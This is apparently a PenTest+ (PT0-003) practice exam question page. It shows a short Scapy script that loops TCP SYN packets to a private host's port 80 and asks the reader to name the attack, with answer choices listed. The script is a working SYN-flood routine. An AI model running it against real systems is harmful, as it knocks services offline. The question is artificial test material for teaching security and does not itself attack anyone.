List of questions
Related questions
Question 4 - PT0-003 discussion
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:
ip = IP('192.168.50.2')
tcp = TCP(sport=RandShort(), dport=80, flags='S')
raw = RAW(b'X'*1024)
p = ip/tcp/raw
send(p, loop=1, verbose=0)
Which of the following attack types is most likely being used in the test?
A.
MDK4
B.
Smurf attack
C.
FragAttack
D.
SYN flood
Your answer:
0 comments
Sorted by
Leave a comment first